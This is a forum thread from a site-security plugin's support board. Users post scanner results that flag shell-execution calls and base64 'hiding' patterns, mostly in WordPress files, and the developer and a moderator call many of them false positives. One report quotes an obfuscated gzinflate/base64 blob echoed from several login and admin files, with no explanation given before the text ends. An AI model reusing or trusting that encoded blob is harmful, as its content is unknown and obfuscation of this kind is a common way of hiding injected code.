Security Tools Plugin

[denbec]

Happy New Year all!   

After a lot of work on my part, my site at http://www.nightowlstaffing.com was ranking very high on Google searches until around Dec. 30th 2010.  Suddenly it's not listed anywhere when searching for "2nd shift jobs" or "3rd shift jobs" (those used to be high ranking on the first page).  I suspected maybe the site was hacked but now I'm not sure.  I installed the latest version of Security Tools v2.1 (thanks for the program Adam!) and I got the results below.  Most of them are from my associated WordPress blog at http://www.nightowlstaffing.com/jobblog  If Peter, Adam or anyone has time to review these and let me know if they are real threats and what I should do next I would really appreciate it!

Thanks  in advance!

Dennis

Possibly bad code (execution of a shell command) /home/nightowl/public_html/testweb/locate_convert.php on line 5:
$retval = system ("locate convert");
Possibly bad code in (command execution) /home/nightowl/public_html/testweb/locate_convert.php on line 5:
$retval = system ("locate convert");
Possibly bad code (execution of a shell command) /home/nightowl/public_html/admin/suggest_permissions.php on line 118:
exec ('ls -o '.$temp, $output);
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-content/plugins/pretty-link/classes/models/PrliUpdate.php on line 228:
return base64_decode($client->getResponse());
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/theme.php on line 68:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/class-pclzip.php on line 3222:
// extracted in the filesystem (extract).
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 514:
* Assumes that WP_Filesystem() has already been called and set up. Does not extract a root-level __MACOSX directory, if present.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 570:
* Assumes that WP_Filesystem() has already been called and set up.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 652:
* Assumes that WP_Filesystem() has already been called and set up.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 724:
* Assumes that WP_Filesystem() has already been called and setup.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 774:
function WP_Filesystem( $args = false, $context = false ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/plugin.php on line 625:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/class-wp-upgrader.php on line 70:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/update-core.php on line 317:
if ( ! WP_Filesystem($credentials, ABSPATH) ) {
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-app.php on line 1457:
explode(':', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION'], 6)));
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-app.php on line 1462:
explode(':', base64_decode(substr($_SERVER['REDIRECT_REMOTE_USER'], 6)));
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/class-phpmailer.php on line 438:
if([email protected]$mail = popen($sendmail, 'w')) {
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 263:
define('SIMPLEPIE_PCRE_HTML_ATTRIBUTE', '((?:[\x09\x0A\x0B\x0C\x0D\x20]+[^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x09\x0A\x0B\x0C\x0D\x20]*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?)*)[\x09\x0A\x0B\x0C\x0D\x20]*');
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 9183:
if (isset($matches[$i][2][0]) && preg_match_all('/[\x09\x0A\x0B\x0C\x0D\x20]+([^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*)(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x09\x0A\x0B\x0C\x0D\x20]*(?:"([^"]*)"|\'([^\']*)\'|([^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?/', ' ' . $matches[$i][2][0] . ' ', $attribs, PREG_SET_ORDER))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 10775:
$curl = substr($curl, 5, strcspn($curl, "\x09\x0A\x0B\x0C\x0D", 5));
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 10779:
$curl = substr($curl, 8, strcspn($curl, "\x09\x0A\x0B\x0C\x0D", );
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11048:
$space_characters = "\x20\x09\x0A\x0B\x0C\x0D";
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11255:
elseif (substr($data, 0, 20) === "\x00\x00\x00\x3C\x00\x00\x00\x3F\x00\x00\x00\x78\x00\x00\x00\x6D\x00\x00\x00\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11257:
if ($pos = strpos($data, "\x00\x00\x00\x3F\x00\x00\x00\x3E"))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11268:
elseif (substr($data, 0, 20) === "\x3C\x00\x00\x00\x3F\x00\x00\x00\x78\x00\x00\x00\x6D\x00\x00\x00\x6C\x00\x00\x00")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11270:
if ($pos = strpos($data, "\x3F\x00\x00\x00\x3E\x00\x00\x00"))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11281:
elseif (substr($data, 0, 10) === "\x00\x3C\x00\x3F\x00\x78\x00\x6D\x00\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11294:
elseif (substr($data, 0, 10) === "\x3C\x00\x3F\x00\x78\x00\x6D\x00\x6C\x00")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11307:
elseif (substr($data, 0, 5) === "\x3C\x3F\x78\x6D\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13583:
$ws = strspn($this->file->body, "\x09\x0A\x0B\x0C\x0D\x20");
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13603:
elseif (substr($this->file->body, 0, === "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13634:
elseif (substr($this->file->body, 0, === "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14820:
if (preg_match('/(&(#(x[0-9a-fA-F]+|[0-9]+)|[a-zA-Z0-9]+)|<\/[A-Za-z][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E]*' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . '>)/', $data))
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14832:
$data = base64_decode($data);
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14875:
$data = preg_replace('/(<[A-Za-z][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E]*)' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . trim($attrib) . '(?:\s*=\s*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . '>/', '\1\2\3>', $data);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/class-snoopy.php on line 1015:
exec($this->curl_path." -k -D \"$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/Text/Diff/Engine/shell.php on line 50:
$diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file);
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-includes/class-IXR.php on line 249:
$value = base64_decode( trim( $this->_currentTagContents ) );
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php on line 31:
$data = shell_exec($cmd);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php on line 75:
$data = shell_exec($cmd);

[Peter]

.... they are quite annoying especially the one that lists the cache files as it seems to get longer each time....

Annoying? They are only cache files that Traffic Cop creates in order to speed up operation. There is nothing that I can do other than telling to Adam and he might make the Security Tools plugin ignore these cache files.

I am sure that the list of "possible threats" will never be empty, with new plugins being introduced and old plugins being revised constantly. You will still need to rely on your own judgment to some extent.

[lithium]

OK, thanks for the reply. Excellent plugin by the way, when you look at the deny log it makes you realise to how many threats are out there, keep up the good work!

[denbec]

Has anyone had a chance to check my errors above?   

Thanks in advance!

Dennis

[Adam]

Hi Dennis,
Thanks for posting! The results seems ok, it looks like a lot of false-positives in Wordpress...I may need to adjust the plugin for these
You can also check Google Webmaster tools, they also provide report if any malware has been detected on your site.
Adam

[denbec]

Adam - thanks for your response!   

Just an FYI - my Google rankings are suddenly back where they were before with no intervention on my part.  Must have been a Google Thing.  Nice.   

[rutulo]

Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null


can you help me??? 

[Peter]

Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null


can you help me??? 

Rutulo,

No problem! That's just the JavaScript code and there is nothing wrong with it! 

[rutulo]

Thank's Peter! 

[Sparrotic]

I just installed Jamit and a whole bunch of plugins, just got this security report,

Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null
Found 3 threats. Some may be false-positives. Please discuss this on the forum
---------------------------------
Possibly a rogue php file: /home/youhire1/public_html/cache/e4fe98bfc2jarfile.txt
Found 1 rogue files. Some may be false-positives

Any feedback, also wondering if I could get a general checkup on my site, I'm unexperienced just followed a bunch of tutorials, after paying someone thousands of dollars to do it for me a few years ago, only to end up with an unlicensed version, so I bought a license and did it myself

www.youhireme.com

[Peter]

I just installed Jamit and a whole bunch of plugins, just got this security report,

Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null
Found 3 threats. Some may be false-positives. Please discuss this on the forum
---------------------------------
Possibly a rogue php file: /home/youhire1/public_html/cache/e4fe98bfc2jarfile.txt
Found 1 rogue files. Some may be false-positives

Any feedback, also wondering if I could get a general checkup on my site, I'm unexperienced just followed a bunch of tutorials, after paying someone thousands of dollars to do it for me a few years ago, only to end up with an unlicensed version, so I bought a license and did it myself

www.youhireme.com

Hi, if you look about 2 messages up, you will see my earlier comment that those scw_js... files are OK.

[maddisona]

HI, Just ran the SCan PHP Files via the Security Tools. Informed to post to this forum (13 threats). can anyone offer any input/advice? Thanks in advance.

Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/lang/english_default.php on line 1434:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/index.php on line 7:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/login.php on line 22:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/main.php on line 157:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/index.php on line 15:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/login.php on line 10:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/index.php on line 81:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
 if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
 scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
 scwExpValDay.exec(scwArrSeed[2]) == null
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/config-default.php on line 320:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/main.php on line 157:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/index.php on line 11:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Found 13 threats. Please discuss this on the forum (Opens in a new window)

[Peter]

HI, Just ran the SCan PHP Files via the Security Tools. Informed to post to this forum (13 threats). can anyone offer any input/advice? Thanks in advance.

Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/lang/english_default.php on line 1434:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/index.php on line 7:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/login.php on line 22:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/main.php on line 157:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/index.php on line 15:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/login.php on line 10:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/index.php on line 81:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
 if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
 scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
 scwExpValDay.exec(scwArrSeed[2]) == null
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/config-default.php on line 320:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/main.php on line 157:
